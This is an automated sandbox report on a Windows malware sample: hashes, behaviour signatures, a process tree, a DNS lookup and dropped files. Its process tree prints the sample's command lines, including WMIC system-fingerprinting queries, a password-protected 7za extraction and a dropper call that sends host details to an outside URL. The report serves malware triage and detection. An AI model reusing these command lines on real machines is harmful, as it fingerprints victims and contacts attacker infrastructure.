be535447f6baedc894f1bbd938733394c8b5ea43c5184e8c1643175e3e78a35a

Analysis

max time kernel
121s
max time network
126s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
16/06/2024, 12:48 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
Size

406KB
MD5

b396063e909ca4c992a06cdbc2df0cd3
SHA1

258def0a71f12cadab512b9aade17446bced5373
SHA256

be535447f6baedc894f1bbd938733394c8b5ea43c5184e8c1643175e3e78a35a
SHA512

ea940af80aa6897ad54c20b8d55a6b25e7ca4b76fee0064eddb71c39ab287bc083c89598b08bb1e6819441a02994d1f8f805b52db89d9a72bed6250fbfb171f0
SSDEEP

12288:/A0i50GM1/EsSaaizIqHJNQbO4tYGbeNiro6:/AfyGEj7IqHDvEiNX6

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2984	7za.exe
580	setupcl.exe

Loads dropped DLL 8 IoCs

pid	Process
1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2688	WMIC.exe
Token: SeSecurityPrivilege	2688	WMIC.exe
Token: SeTakeOwnershipPrivilege	2688	WMIC.exe
Token: SeLoadDriverPrivilege	2688	WMIC.exe
Token: SeSystemProfilePrivilege	2688	WMIC.exe
Token: SeSystemtimePrivilege	2688	WMIC.exe
Token: SeProfSingleProcessPrivilege	2688	WMIC.exe
Token: SeIncBasePriorityPrivilege	2688	WMIC.exe
Token: SeCreatePagefilePrivilege	2688	WMIC.exe
Token: SeBackupPrivilege	2688	WMIC.exe
Token: SeRestorePrivilege	2688	WMIC.exe
Token: SeShutdownPrivilege	2688	WMIC.exe
Token: SeDebugPrivilege	2688	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2688	WMIC.exe
Token: SeRemoteShutdownPrivilege	2688	WMIC.exe
Token: SeUndockPrivilege	2688	WMIC.exe
Token: SeManageVolumePrivilege	2688	WMIC.exe
Token: 33	2688	WMIC.exe
Token: 34	2688	WMIC.exe
Token: 35	2688	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2688	WMIC.exe
Token: SeSecurityPrivilege	2688	WMIC.exe
Token: SeTakeOwnershipPrivilege	2688	WMIC.exe
Token: SeLoadDriverPrivilege	2688	WMIC.exe
Token: SeSystemProfilePrivilege	2688	WMIC.exe
Token: SeSystemtimePrivilege	2688	WMIC.exe
Token: SeProfSingleProcessPrivilege	2688	WMIC.exe
Token: SeIncBasePriorityPrivilege	2688	WMIC.exe
Token: SeCreatePagefilePrivilege	2688	WMIC.exe
Token: SeBackupPrivilege	2688	WMIC.exe
Token: SeRestorePrivilege	2688	WMIC.exe
Token: SeShutdownPrivilege	2688	WMIC.exe
Token: SeDebugPrivilege	2688	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2688	WMIC.exe
Token: SeRemoteShutdownPrivilege	2688	WMIC.exe
Token: SeUndockPrivilege	2688	WMIC.exe
Token: SeManageVolumePrivilege	2688	WMIC.exe
Token: 33	2688	WMIC.exe
Token: 34	2688	WMIC.exe
Token: 35	2688	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2656	WMIC.exe
Token: SeSecurityPrivilege	2656	WMIC.exe
Token: SeTakeOwnershipPrivilege	2656	WMIC.exe
Token: SeLoadDriverPrivilege	2656	WMIC.exe
Token: SeSystemProfilePrivilege	2656	WMIC.exe
Token: SeSystemtimePrivilege	2656	WMIC.exe
Token: SeProfSingleProcessPrivilege	2656	WMIC.exe
Token: SeIncBasePriorityPrivilege	2656	WMIC.exe
Token: SeCreatePagefilePrivilege	2656	WMIC.exe
Token: SeBackupPrivilege	2656	WMIC.exe
Token: SeRestorePrivilege	2656	WMIC.exe
Token: SeShutdownPrivilege	2656	WMIC.exe
Token: SeDebugPrivilege	2656	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2656	WMIC.exe
Token: SeRemoteShutdownPrivilege	2656	WMIC.exe
Token: SeUndockPrivilege	2656	WMIC.exe
Token: SeManageVolumePrivilege	2656	WMIC.exe
Token: 33	2656	WMIC.exe
Token: 34	2656	WMIC.exe
Token: 35	2656	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2656	WMIC.exe
Token: SeSecurityPrivilege	2656	WMIC.exe
Token: SeTakeOwnershipPrivilege	2656	WMIC.exe
Token: SeLoadDriverPrivilege	2656	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
580	setupcl.exe
580	setupcl.exe

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 1696 wrote to memory of 2688	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	28
PID 1696 wrote to memory of 2688	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	28
PID 1696 wrote to memory of 2688	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	28
PID 1696 wrote to memory of 2688	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	28
PID 1696 wrote to memory of 2656	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	31
PID 1696 wrote to memory of 2656	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	31
PID 1696 wrote to memory of 2656	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	31
PID 1696 wrote to memory of 2656	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	31
PID 1696 wrote to memory of 2708	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	33
PID 1696 wrote to memory of 2708	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	33
PID 1696 wrote to memory of 2708	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	33
PID 1696 wrote to memory of 2708	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	33
PID 1696 wrote to memory of 2756	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	35
PID 1696 wrote to memory of 2756	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	35
PID 1696 wrote to memory of 2756	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	35
PID 1696 wrote to memory of 2756	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	35
PID 1696 wrote to memory of 2984	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	37
PID 1696 wrote to memory of 2984	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	37
PID 1696 wrote to memory of 2984	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	37
PID 1696 wrote to memory of 2984	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	37
PID 1696 wrote to memory of 580	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	39
PID 1696 wrote to memory of 580	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	39
PID 1696 wrote to memory of 580	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	39
PID 1696 wrote to memory of 580	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	39
PID 1696 wrote to memory of 580	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	39
PID 1696 wrote to memory of 580	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	39
PID 1696 wrote to memory of 580	1696	b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe	39
PID 580 wrote to memory of 2948	580	setupcl.exe	40
PID 580 wrote to memory of 2948	580	setupcl.exe	40
PID 580 wrote to memory of 2948	580	setupcl.exe	40
PID 580 wrote to memory of 2948	580	setupcl.exe	40

C:\Users\Admin\AppData\Local\Temp\b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1696
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2688
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get Version /FORMAT:textvaluelist.xsl
  2⤵
  PID:2708
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
  2⤵
  PID:2756
- C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\7za.exe
  7za.exe e -y -p"4b4e0a8e25264cabf48c2fb5a66f7511" [RANDOM_STRING].7z
  2⤵
  - Executes dropped EXE
  PID:2984
- C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\setupcl.exe
  "C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\setupcl.exe" /initurl http://sub.yorkshatb.com/init/b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118/:uid:? /affid "-" /id "0" /name " " /uniqid b396063e909ca4c992a06cdbc2df0cd3_JaffaCakes118 /uuid stance(s) Available. /biosserial /biosversion BOCHS - 1 /csname stance(s) Available.
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:580
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    wmic bios get serialnumber, version
    3⤵
    PID:2948

Network

DNS

sub.yorkshatb.com

setupcl.exe

Remote address:

8.8.8.8:53

Request

sub.yorkshatb.com

IN A

Response

No results found

8.8.8.8:53

sub.yorkshatb.com

dns

setupcl.exe

63 B
136 B
1
1

DNS Request

sub.yorkshatb.com

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\[RANDOM_STRING].7z

Filesize
80KB

MD5
030704fec8e09f22541695badb27552d

SHA1
33dabb64be1a527e20819e516a1257ed3c10461f

SHA256
284a9b6e90bd414133fb235c7ada9126790548eb6d1b32f43ceb78df6c6facd6

SHA512
04977560a6f8fa1889e0c21afc1b7cfa802bfe221db0084cffabbd4dfffe14c31075cfa3d4618b6bffb6e625b3cb31680b9a2b9646cd1c5078a6405870bd44f6

Download Submit
\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\7za.exe

Filesize
574KB

MD5
42badc1d2f03a8b1e4875740d3d49336

SHA1
cee178da1fb05f99af7a3547093122893bd1eb46

SHA256
c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf

SHA512
6bc519a7368ee6bd8c8f69f2d634dd18799b4ca31fbc284d2580ba625f3a88b6a52d2bc17bea0e75e63ca11c10356c47ee00c2c500294abcb5141424fc5dc71c

Download Submit
\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\nsExec.dll

Filesize
8KB

MD5
b8be6632a7dc8136ff01338be40fe701

SHA1
043fa16929b2af5ed5c1c59b4035a10cf765fb43

SHA256
289786fe13801467653eb2712f47f162d6fd3fc2d844be342282f75fc2b2a085

SHA512
403474154ff8500e5aae2b4466c652e5d066af2c55d8f158e6f007492ceb1f3abcc6cca80842b90900db02db4258ddcda75dec1d1799af24969c35811891e5b8

Download Submit
\Users\Admin\AppData\Local\Temp\nsd4BD1.tmp\setupcl.exe

Filesize
193KB

MD5
10bd2af1b07ec6bc9cd17ba512569e59

SHA1
807e17ab1b98177e135d30941b45081960d1e866

SHA256
9c620ef6eac3d0d9d3f6f2622a53d1f543cebd93846636ba397683962c07fc7c

SHA512
deacd041f12b6ec74f9e4488874ce962037990ed0ae424aaeabf2c35876b2ebbb943f92e9a4ffe504718bb00021209b035439ea4d7c64a4031b86ce9104ce3ed

Download Submit
memory/1696-41-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download